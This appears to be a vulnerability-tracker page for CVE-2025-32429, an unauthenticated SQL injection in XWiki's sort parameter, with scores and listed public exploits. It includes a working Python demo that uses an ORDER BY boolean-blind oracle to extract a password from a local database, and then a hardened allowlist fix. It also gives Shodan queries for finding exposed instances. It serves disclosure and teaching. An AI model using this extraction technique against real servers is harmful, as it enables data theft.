CVE-2025-32429

CRITICAL EXPLOITED NUCLEI

XWiki Platform - SQL Injection

Title source: nuclei

Exploitation Summary

CVE-2025-32429 has been observed exploited in the wild (reported by VulnCheck KEV). EIP tracks 7 public exploits from researchers including Byte Reaper, byteReaper77, cybersecplayground. A Nuclei detection template is also available.

AI-analyzed exploit summary: This is a C-based exploit for CVE-2025-32429, targeting a blind SQL injection vulnerability in XWiki Platform's `getdeleteddocuments.vm` template via the `sort` parameter. The PoC sends crafted payloads to the REST endpoint and measures response delays (a time-based blind oracle) to confirm successful injection.

Description

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 9.4-rc-1 through 16.10.5 and 17.0.0-rc-1 through 17.2.2, any unauthenticated user can inject SQL through the `sort` parameter of the getdeleteddocuments.vm template: the value is concatenated into the query's ORDER BY clause as-is. Unlike a WHERE-clause value, an ORDER BY target cannot be supplied as a bound parameter (a bound value would sort by a constant), so the only safe handling is to validate the sort value against an allowlist of sortable columns before it reaches the query. This is fixed in versions 16.10.6 and 17.3.0-rc-1.
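The bug class described above, as an added example that is not XWiki's code and not one of the PoCs listed on this page. It models the same pattern (a user-controlled sort value spliced into ORDER BY unchanged) against an in-memory SQLite database with constructed rows; XWiki itself runs HQL through Hibernate, so the table and column names here are illustrative. It goes a step beyond the page's time-based PoCs by building the blind oracle from row ordering alone, which works even where no sleep function is reachable, and then shows the allowlist form the ORDER BY position requires.

```python
"""Added example, not code from XWiki or from the page's own PoCs.

Models the bug class in CVE-2025-32429: a user-controlled `sort` value is
spliced into ORDER BY unchanged. Uses an in-memory SQLite database with
constructed sample rows (XWiki runs HQL through Hibernate; table and column
names here are illustrative). Shows:
  1. the vulnerable concatenation,
  2. a boolean-blind oracle built purely from row ordering, driving a full
     character-by-character extraction of a secret, and
  3. the hardened form, which allowlists the sortable column and direction
     because an ORDER BY target cannot be passed as a bound parameter.
"""
import re
import sqlite3

# Constructed sample data (not from any real XWiki instance).
DELETED_DOCS = [("Main.Deleted1", "alice"), ("Main.Deleted2", "bob"), ("Sandbox.Old", "carol")]
SECRET_USER = ("admin", "s3cret")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE deleted_docs (fullname TEXT, deleter TEXT)")
    conn.executemany("INSERT INTO deleted_docs VALUES (?, ?)", DELETED_DOCS)
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", SECRET_USER)
    return conn


def vulnerable_list(conn, sort):
    """The vulnerable pattern: `sort` lands in ORDER BY as-is."""
    return [r[0] for r in conn.execute(f"SELECT fullname FROM deleted_docs ORDER BY {sort}")]


def leak_bit(conn, condition):
    """One bit per request. If `condition` holds, rows come back ascending by
    fullname; otherwise every CASE value ties and the DESC tiebreak wins, so
    the first row flips. No error text and no timing are needed."""
    sort = f"CASE WHEN ({condition}) THEN fullname ELSE '' END ASC, fullname DESC"
    return vulnerable_list(conn, sort)[0] == "Main.Deleted1"


def extract_via_order(conn, expr, max_len=32):
    """Boolean-blind extraction of the scalar SQL expression `expr`, one
    printable character at a time, via binary search over its code point."""
    out = ""
    for i in range(1, max_len + 1):
        if not leak_bit(conn, f"length({expr}) >= {i}"):
            break  # past the end of the value
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if leak_bit(conn, f"unicode(substr({expr}, {i}, 1)) >= {mid}"):
                lo = mid
            else:
                hi = mid - 1
        out += chr(lo)
    return out


SORTABLE_COLUMNS = {"fullname", "deleter"}
SORT_SYNTAX = re.compile(r"^(\w+)(?:\s+(asc|desc))?$", re.IGNORECASE)


def safe_list(conn, sort):
    """Hardened form: only an allowlisted identifier and a normalized
    direction are ever spliced into the query; anything else is rejected."""
    m = SORT_SYNTAX.match(sort.strip())
    if not m or m.group(1).lower() not in SORTABLE_COLUMNS:
        raise ValueError(f"rejected sort value: {sort!r}")
    column, direction = m.group(1).lower(), (m.group(2) or "asc").upper()
    return [r[0] for r in conn.execute(f"SELECT fullname FROM deleted_docs ORDER BY {column} {direction}")]


def run_demo():
    conn = make_db()
    secret_expr = "(SELECT password FROM users WHERE name = 'admin')"
    result = {
        "normal_order": vulnerable_list(conn, "fullname"),
        "leaked_password": extract_via_order(conn, secret_expr),
        "safe_desc_first": safe_list(conn, "deleter DESC")[0],
    }
    try:
        safe_list(conn, "CASE WHEN (1=1) THEN fullname ELSE '' END ASC, fullname DESC")
        result["injection_rejected"] = False
    except ValueError:
        result["injection_rejected"] = True
    return result


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The oracle in `leak_bit` needs nothing but two distinguishable orderings, which is why ORDER BY injection remains exploitable when a WAF strips sleep and error-producing payloads. The allowlist in `safe_list` is the check a code reviewer should look for at any sort or column-name parameter: a regex alone is not enough, because `\w+` still admits arbitrary column names, so the identifier is compared against the explicit set as well.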

Exploits (7)

exploitdb · WORKING POC
by Byte Reaper · cwebappsmultiple
https://www.exploit-db.com/exploits/52384

This is a C-based exploit for CVE-2025-32429, targeting a blind SQL injection vulnerability in XWiki Platform's `getdeleteddocuments.vm` template via the `sort` parameter. The PoC sends crafted payloads to the REST endpoint and measures response delays to confirm successful injection.

Classification: Working PoC (95%)
Attack Type: SQLi
Complexity: Moderate
Reliability: Reliable
Target: XWiki Platform ≤ 14.x (analyzer's figure; the advisory's affected range runs through 16.10.5 and 17.2.2)
No auth needed
Prerequisites: Access to the target XWiki instance · Network connectivity to the REST endpoint
devstral-2 · analyzed Feb 16, 2026
nomisec · WORKING POC · 10 stars
by byteReaper77 · infoleak
https://github.com/byteReaper77/CVE-2025-32429

This repository contains a C-based Proof-of-Concept for CVE-2025-32429, a blind SQL injection vulnerability in XWiki's LiveData REST API. The exploit detects WAF interference and iterates through SQLi payloads to measure response times and search for indicative keywords.

Classification: Working PoC (95%)
Attack Type: SQLi
Complexity: Moderate
Reliability: Reliable
Target: XWiki Platform (version not specified)
No auth needed
Prerequisites: Linux x86_64 · GCC · libcurl development headers · argparse C library
devstral-2 · analyzed Feb 16, 2026
github · WRITEUP · 7 stars
by cybersecplayground · poc
https://github.com/cybersecplayground/PoC-and-CVE-Reports/tree/main/2025/CVE-2025-32429.md

The repository contains detailed technical writeups for multiple CVEs, including CVE-2025-32429, with in-depth analysis, proof-of-concept examples, and mitigation strategies. Each writeup includes a vulnerability description, the affected endpoints, and exploitation techniques. The classification fields below describe the repository as a whole, not the CVE-2025-32429 entry alone.

Classification: Writeup (95%)
Attack Type: Other
Complexity: Moderate
Reliability: Reliable
Target: Various (e.g., account_mgr.cgi, Ivanti Connect Secure, Zabbix, Check Point VPN, Bricks Builder)
No auth needed
Prerequisites: Access to vulnerable endpoints · Basic understanding of HTTP requests and payloads
devstral-2 · analyzed Feb 27, 2026
nomisec · WORKING POC
by TheNaderr · poc
https://github.com/TheNaderr/CVE-2025-32429

This repository contains a functional exploit for CVE-2025-32429. The analyzer's summary describes the target as SQL injection in PHP PDO prepared statements with emulation enabled; that does not match this CVE, which is in XWiki (a Java application) and involves no PDO. The usable part of the summary is that the exploit sends a series of SQL injection payloads through the `sort` parameter of getdeleteddocuments.vm to test and exploit the vulnerable XWiki instance.

Classification: Working PoC (90%)
Attack Type: SQLi
Complexity: Moderate
Reliability: Reliable
Target: XWiki platform (specific version not specified)
No auth needed
Prerequisites: Target system with vulnerable XWiki platform · Network access to the target
devstral-2 · analyzed Apr 13, 2026
nomisec · SCANNER
by imbas007 · poc
https://github.com/imbas007/CVE-2025-32429-Checker

This repository contains a Python-based vulnerability scanner for detecting CVE-2025-32429, an SQL injection vulnerability in XWiki platforms. The scanner supports single and bulk target scanning, WAF detection, and both time-based and error-based SQL injection checks. When reading its results, note that time-based checks are sensitive to network jitter and should be confirmed with repeated measurements before a host is marked vulnerable.

Classification: Scanner (95%)
Attack Type: SQLi
Complexity: Moderate
Reliability: Reliable
Target: XWiki
No auth needed
Prerequisites: Network access to the target XWiki instance
devstral-2 · analyzed Feb 16, 2026
nomisec · WORKING POC
by amir-othman · infoleak
https://github.com/amir-othman/CVE-2025-32429

This repository contains a proof-of-concept exploit for CVE-2025-32429. As with the TheNaderr entry above, the analyzer's summary attributes the bug to PHP PDO prepared statements with emulation enabled, which does not apply to this CVE (XWiki is a Java application). The summary's relevant content is that the exploit runs a set of SQL injection payloads against the XWiki platform to test for the vulnerability.

Classification: Working PoC (90%)
Attack Type: SQLi
Complexity: Moderate
Reliability: Reliable
Target: XWiki platform
No auth needed
Prerequisites: A vulnerable XWiki instance (the analyzer's "vulnerable PHP PDO prepared statements" prerequisite does not apply to this CVE) · Network access to the target system
devstral-2 · analyzed Feb 16, 2026
vulncheck_xdb · SCANNER
infoleak
https://github.com/imbas007/CVE-2025-32429-Checker-

This repository contains a Python-based vulnerability scanner for detecting CVE-2025-32429, an SQL injection vulnerability in XWiki platforms. The tool supports single and bulk target scanning, WAF detection, and both time-based and error-based SQL injection checks. It appears to be the same imbas007 checker listed above under nomisec, indexed here from VulnCheck XDB under a slightly different repository URL.

Classification: Scanner (95%)
Attack Type: SQLi
Complexity: Moderate
Reliability: Reliable
Target: XWiki
No auth needed
Prerequisites: Target URL or list of URLs
devstral-2 · analyzed Feb 25, 2026

Nuclei Templates (1)

XWiki Platform - SQL Injection
CRITICAL · VERIFIED · by ritikchaddha
Shodan: html:"data-xwiki-reference"
FOFA: body="data-xwiki-reference"

Scores

CVSS v3.1: 9.8 (Critical)
EPSS: 0.3491
EPSS Percentile: 97.1%
Attack Vector: NETWORK
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation: none (CISA's SSVC assessment; this conflicts with the VulnCheck KEV in-the-wild listing of 2025-11-03 shown below, so treat the KEV entry as the operative signal when prioritizing)
Automatable: yes
Technical Impact: total

Details

VulnCheck KEV: 2025-11-03
CWE: CWE-89
Status: published
Products (2)
org.xwiki.platform/xwiki-platform-distribution-war 9.4-rc-1 - 16.10.6 (Maven; upper bound exclusive, 16.10.6 is the fixed release)
xwiki/xwiki 9.4 - 16.10.6 (upper bound exclusive; the 17.0.0-rc-1 through 17.2.2 range from the advisory is not listed here)
Published: Jul 24, 2025
Tracked Since: Feb 18, 2026